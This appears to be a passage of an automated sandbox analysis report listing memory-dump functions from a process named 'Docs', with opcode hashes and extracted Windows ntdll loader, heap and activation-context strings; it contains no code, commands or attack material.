                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: bcb40d4c9584ebb7ad5a3677efa4261dea0b966195fff1666dda662bd2961d06
                                                              • Instruction ID: fc847c9a09a9655ca4059d69a918008a1015da5b3c4d0e050a81b75973170d5e
                                                              • Opcode Fuzzy Hash: bcb40d4c9584ebb7ad5a3677efa4261dea0b966195fff1666dda662bd2961d06
                                                              • Instruction Fuzzy Hash: 43918D71908346AFD722DF69CC81EAFBAECBF84744F44092EF6859A155E370D904CB62
                                                              Strings
                                                              • .Local, xrefs: 015D28D8
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016122B6
                                                              • SXS: %s() passed the empty activation context, xrefs: 016121DE
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016121D9, 016122B1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 695226ebd490745059eab16bb11d544d0d6c1621083d9400c760276f60e501eb
                                                              • Instruction ID: 17c3fdf4364b5b3325387f7d12a03db770a253e373e5c13f50019e89384444df
                                                              • Opcode Fuzzy Hash: 695226ebd490745059eab16bb11d544d0d6c1621083d9400c760276f60e501eb
                                                              • Instruction Fuzzy Hash: 0AA1BB3190122A9BDB35CF68DC88BA9B7B1BF58354F2445EAD908AB355D7309EC1CF90
                                                              Strings
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01613456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0161342A
                                                              • RtlDeactivateActivationContext, xrefs: 01613425, 01613432, 01613451
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01613437
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 7aaaaafe0e2d057b2c8689a648979ba43fcec2387bd8811e9b14dfb389c175d2
                                                              • Instruction ID: f5a3875438e9abaae3c5cc4e7968a23469c777ccd225d76eee40f468a59f0112
                                                              • Opcode Fuzzy Hash: 7aaaaafe0e2d057b2c8689a648979ba43fcec2387bd8811e9b14dfb389c175d2
                                                              • Instruction Fuzzy Hash: 936102326516129BDB32CF1CCC81B2AB7E5BF90B20F188529E9969F754D730E801CB91
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016010AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0160106B
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01600FE5
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01601028
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: bfb35e05b06bef87eba0864c4813b3749242134e1d37a81b52484c4d81419f69
                                                              • Instruction ID: 218e13f647e4866402be6c0ae333ac20cf2535a56aeb38f4c31df0680c333229
                                                              • Opcode Fuzzy Hash: bfb35e05b06bef87eba0864c4813b3749242134e1d37a81b52484c4d81419f69
                                                              • Instruction Fuzzy Hash: CB71C0B19043069FCB21DF18C884B9B7FE9BF99754F844469F9888F286D734D588CB92
                                                              Strings
                                                              • LdrpDynamicShimModule, xrefs: 0160A998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0160A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0160A9A2
                                                              • apphelp.dll, xrefs: 015C2462
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 1fd6437b4458e27d2cbb8e91f75bc86b5ed9c9d455056f05d7bfb5d5efdf55bc
                                                              • Instruction ID: 2375b99c124849885a5154be8cd810ff542f9e09fd8db5cda2bd906908186f34
                                                              • Opcode Fuzzy Hash: 1fd6437b4458e27d2cbb8e91f75bc86b5ed9c9d455056f05d7bfb5d5efdf55bc
                                                              • Instruction Fuzzy Hash: B7312871610302ABDB369FEDDD85A6EB7B9FB80B44F16001DE9016F385C7705892C790
                                                              Strings
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015B327D
                                                              • HEAP[%wZ]: , xrefs: 015B3255
                                                              • HEAP: , xrefs: 015B3264
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: b7a25ade2aeb49265009fa455005297e4063b9814768586b2a64b434f6c6e948
                                                              • Instruction ID: cc8986532be024797f131071bf7b62554e83da0fb6607f40ce869ee215a02b67
                                                              • Opcode Fuzzy Hash: b7a25ade2aeb49265009fa455005297e4063b9814768586b2a64b434f6c6e948
                                                              • Instruction Fuzzy Hash: FF929A71A046499FDB25CF68C8847EEBBF1FF48300F188499E859AF291D735A945CF60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: 63ae19da1c96fffb46d639f8815719ccaacd4d21bfdccb835705352dd1c63e9f
                                                              • Instruction ID: 4144466f2eaa0450e39489336a0de35149c286bb65d26989d0c854ef16ae5673
                                                              • Opcode Fuzzy Hash: 63ae19da1c96fffb46d639f8815719ccaacd4d21bfdccb835705352dd1c63e9f
                                                              • Instruction Fuzzy Hash: 2AF17830A00606DFEB2ACF68C894BABB7F5FF44704F1485A9E5169B391D734A981CF91
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: a4402739ccf5128ef30a0f87f727d7a60a17751f82a306fc6305f7ff46426195
                                                              • Instruction ID: 2b552d2cf512e3a04d59eb3bedd4f9b897201497e2fa2a49e256a44c465e0325
                                                              • Opcode Fuzzy Hash: a4402739ccf5128ef30a0f87f727d7a60a17751f82a306fc6305f7ff46426195
                                                              • Instruction Fuzzy Hash: EEC28E716083419FD72ACF68C881BABBBE5BFC8B14F04896DE9898B341D774D905CB52
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: fa96f6e1a8a591a0449cf534bf84bf0cf240d2904cdffcdb3cf770b675842ee7
                                                              • Instruction ID: 994a23e8e7f9a7618b783e989dd0058f52ad67dbeadc075fbd0bdb6b81baab2c
                                                              • Opcode Fuzzy Hash: fa96f6e1a8a591a0449cf534bf84bf0cf240d2904cdffcdb3cf770b675842ee7
                                                              • Instruction Fuzzy Hash: A0A14B7591162A9BDF319F68CC88BAEB7B8FF44700F1041E9DA09AB250E7359E84CF50
                                                              Strings
                                                              • LdrpCheckModule, xrefs: 0160A117
                                                              • Failed to allocated memory for shimmed module list, xrefs: 0160A10F
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0160A121
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 74fc4855f08eae96ce7c19236a405de759b19a901489591e53c9bd0397835093
                                                              • Instruction ID: 1ab411b29e7713152905089d03af22332a38f4ef9938795809792b0ba7482769
                                                              • Opcode Fuzzy Hash: 74fc4855f08eae96ce7c19236a405de759b19a901489591e53c9bd0397835093
                                                              • Instruction Fuzzy Hash: 0A71BE75A00306DFDB2ADFA8CD85ABEB7F4FB84604F14446DE912AB391E734A941CB50
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: 2c939e09984470785bc654750182346d7c0a79d05ae21be2c89d59ed56aa7a7f
                                                              • Instruction ID: 7e5460b3be8e3ed3f1d1a6537adb136339439f57e9b0d45fcd23bfc45de055e2
                                                              • Opcode Fuzzy Hash: 2c939e09984470785bc654750182346d7c0a79d05ae21be2c89d59ed56aa7a7f
                                                              • Instruction Fuzzy Hash: 4D619E716003069FDB29CF28D880BABBBF5FF45704F148959E45A8F292D7B0E881CB95
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 016182D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016182E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 016182DE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: 4bab97c1d1ee8a7ba6c7385f60b6bfd8770ff7988f2f6bdbd5ed923070d7ad6e
                                                              • Instruction ID: bc9878863b2af4399c441570474a139eff8628fda70c8778e01b1286979ce0d7
                                                              • Opcode Fuzzy Hash: 4bab97c1d1ee8a7ba6c7385f60b6bfd8770ff7988f2f6bdbd5ed923070d7ad6e
                                                              • Instruction Fuzzy Hash: F841BF71551312ABCB31EF69DC84B5B77ECBF88650F05492EB948DB294E770E810CB92
                                                              Strings
                                                              • PreferredUILanguages, xrefs: 0165C212
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0165C1C5
                                                              • @, xrefs: 0165C1F1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 2456875319e214b47dcb926c6b46ab439e8075f2c6570f3ce656f9946a6756e5
                                                              • Instruction ID: b2c93ff6ea3b8c83dcbebc3dcf9b958b024f181c78175e32679a287affd448a6
                                                              • Opcode Fuzzy Hash: 2456875319e214b47dcb926c6b46ab439e8075f2c6570f3ce656f9946a6756e5
                                                              • Instruction Fuzzy Hash: 10417071E0030AEBDF55DAD8CC91BEEBBBCBB54744F14806AEA09B7240D7749A448B90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 6831df71530d5ab50ff053ba2c354045e53dcc3e80aa9ed703295a9668d856a2
                                                              • Instruction ID: 974da090420c15ad89fbc14ead1811cb92100df0ceb410ba7f8c3adadcf38e7f
                                                              • Opcode Fuzzy Hash: 6831df71530d5ab50ff053ba2c354045e53dcc3e80aa9ed703295a9668d856a2
                                                              • Instruction Fuzzy Hash: 1341CF32A006598FEB26DBA9CC44BADFBB9FF95340F14045AD901BF791DB758901CB50
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01624888
                                                              • LdrpCheckRedirection, xrefs: 0162488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01624899
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51166b39eb66b2bb94aaf2a54c118daba1ba342ccb122ad610c8bfadcc1caf7f
                                                              • Instruction ID: 51fdef1d00592a2a0234e53a90928ff38181f9a42ac970fc333344ad85a7829e
                                                              • Opcode Fuzzy Hash: 51166b39eb66b2bb94aaf2a54c118daba1ba342ccb122ad610c8bfadcc1caf7f
                                                              • Instruction Fuzzy Hash: BE423A75A102198FEB25CF69CC81BEDBBF9BF88300F158199E949AB342D7349985CF50
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf9c8b902f00c84761796dbae1661add7181887ae2238783e4656a436456f6fe
                                                              • Instruction ID: f12c834263e953324ef3aa4bc7c4f28cca6b41e1bde3adc7cfd8d04c971d69ae
                                                              • Opcode Fuzzy Hash: bf9c8b902f00c84761796dbae1661add7181887ae2238783e4656a436456f6fe
                                                              • Instruction Fuzzy Hash: 4832BB70A007568BDB2ACF69CC447BEBBF2BF84304F24451DD58A9B385D735A962CB60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a475f0ee403e7f5bd2bdb146303487afb6a4963a239fefdee607730a5e6ec6e0
                                                              • Instruction ID: 67358a71aa5cfc50d960f23bd21620aba5246f617c223339e3676a67a988d903
                                                              • Opcode Fuzzy Hash: a475f0ee403e7f5bd2bdb146303487afb6a4963a239fefdee607730a5e6ec6e0
                                                              • Instruction Fuzzy Hash: 4D22EF74284661ABEB25CFADC890376BBF1AF44300F08845DE9878F786E335E452DB60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                              • Instruction ID: 2ce6ea69956b1a30838ff2d2f6bb4e642a501a0713cf19ed04e62c7c0b7d1d75
                                                              • Opcode Fuzzy Hash: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                              • Instruction Fuzzy Hash: C732A271A01215CFDB29CF68C880BAEBBF1FF48310F588569E956AB791D774E841CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: 04aa80ec245e5a48b419f1b47d053e5279a78fe218fb192885a4aa5e6c9825cf
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: 1DF15C74E0020A9FDB19DFD9C990AAEBBF5BF48B14F05852DE905AB350E774E841CB60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f6edeb22f17ddc0ba366442da5dfb509eae79b28b98052b4855795192c78cfa
                                                              • Instruction ID: 59baa22e5fe114c5858c3fe91a6f52b879415ef4c62400008b22d7159702b47d
                                                              • Opcode Fuzzy Hash: 5f6edeb22f17ddc0ba366442da5dfb509eae79b28b98052b4855795192c78cfa
                                                              • Instruction Fuzzy Hash: A4D1C371E0060A9BDF19CF69CC41AFEB7F9BFC8304F188269E956A7241D735E9068B50
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b8c7afc597a0c1681c8b965eae4ef9f5c26de58bb6a2bfbb722d2d4d928ee4c
                                                              • Instruction ID: 4ae723b4600eb80c42b9789aa0c2b432fc2c67e8ee9ba3667a555e5ef75eb5f3
                                                              • Opcode Fuzzy Hash: 3b8c7afc597a0c1681c8b965eae4ef9f5c26de58bb6a2bfbb722d2d4d928ee4c
                                                              • Instruction Fuzzy Hash: 87E19071608342CFC715CF28C490A6EBBE0FF89314F59896DE9998B351EB31E905CB92
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdf1cbf640fccb705a23e72c9a1e34485ed565e2fd806c1d707e1bfb13c036ba
                                                              • Instruction ID: c591dbc82ac292b584b87bd24bf82a9360d76153d2fad65c6b433c5d01c7beda
                                                              • Opcode Fuzzy Hash: cdf1cbf640fccb705a23e72c9a1e34485ed565e2fd806c1d707e1bfb13c036ba
                                                              • Instruction Fuzzy Hash: 47D1DE71A0020BDBDF14CF68C880ABEB7E5BF95204F14862DEA16DF280E735E954CB61
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: 303b1f9696d4022fb4797883a9fe1f8656460d39850efd7e69ec850dcbc59ba0
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: 36B17174A00A15AFDB24DB98CD44AABBBFEBF85304F14845DEA42A7790DB34E905CF50
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 8ae6b1b035d264c95dddbbe2fbaf068cfa0fbb979348ed84a66b91da4e797071
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 4FB19031604646AFDB26DB68C894BBFBBF6BF84200F144599E6529B3D1DB30ED41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4ac2b38e0326a8bd9b5f0c3f5569ed978e0d63e175cd198613bacaea7958369
                                                              • Instruction ID: cccbff339eaa7d5fddeff6af6cd7f5bf3287b3eaf0d2cf47b14c9a2a0fa61bd0
                                                              • Opcode Fuzzy Hash: c4ac2b38e0326a8bd9b5f0c3f5569ed978e0d63e175cd198613bacaea7958369
                                                              • Instruction Fuzzy Hash: DDC146746083419FE764CF19C884BAFB7E5BF88304F44496DE9898B391E774E908CB92
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 010e4bdbd7ba6aa786bf9ce590479f8e526545d72041e91868eecb7521532b64
                                                              • Instruction ID: 2bdd8018e7abf6220ecc6c94c5f07c7b5456eb770966fd2b21d54544f8f6f0ec
                                                              • Opcode Fuzzy Hash: 010e4bdbd7ba6aa786bf9ce590479f8e526545d72041e91868eecb7521532b64
                                                              • Instruction Fuzzy Hash: AEB15170A002668BDB64DF58C890BADB7F5FF84700F0485E9D54AEB281EB74DD85CB21
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8eb1d879e538774c0bddfcb5fcc9659f631cdbe349628a8a5b9f32ff17c437d
                                                              • Instruction ID: 7deb89194b48a22e012561ec45281af3635f0257c0239ad3f7e6593318ebdb04
                                                              • Opcode Fuzzy Hash: d8eb1d879e538774c0bddfcb5fcc9659f631cdbe349628a8a5b9f32ff17c437d
                                                              • Instruction Fuzzy Hash: 61A1E131E006599FEB36CE98CC49BAEBFE4FB01B54F050159EA01AB2D1D7749D80CB91
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3cca73742a7a94c73b1fec895eaa69e62a686539ac3e781876fe29baeff373d
                                                              • Instruction ID: 8a4199abc506f25abc8ffbd4ad81a955c21a31d47ac6dc51644b1214e2fef8f0
                                                              • Opcode Fuzzy Hash: b3cca73742a7a94c73b1fec895eaa69e62a686539ac3e781876fe29baeff373d
                                                              • Instruction Fuzzy Hash: B6A1F371F007169FEB28CF69C994BAAB7F5FF44314F044429EA05AB285DBB4E811CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db1a2d11059d0cdf3e2b2b033ae548e9f89e003077d44464083d6f4d85df2c8d
                                                              • Instruction ID: b50241e040904e516326796eef913aff18519835223a6d01cad58b9ea39304a3
                                                              • Opcode Fuzzy Hash: db1a2d11059d0cdf3e2b2b033ae548e9f89e003077d44464083d6f4d85df2c8d
                                                              • Instruction Fuzzy Hash: 05A1BB72A14212EFD722DF28CD84B6ABBE9FF88704F050528E5859B751DB34ED41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                              • Instruction ID: 06b96d8ee3d47bed4789351c3b0f0be08b5922edd0cbb0f084cf386aa8d284ad
                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                              • Instruction Fuzzy Hash: 97B13771E0065ADFDF29CFA9C890AADBBB5FF88310F14816DE914AB354D730A941CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f81d72b447e043704d3155f2e4a0766ed96f3b0ec5a1fb9020c334992ed327b
                                                              • Instruction ID: 79420ebcf816fd43b3db9d604c702d7a8ddfaf087c176fc5d039d86fb53e0acf
                                                              • Opcode Fuzzy Hash: 6f81d72b447e043704d3155f2e4a0766ed96f3b0ec5a1fb9020c334992ed327b
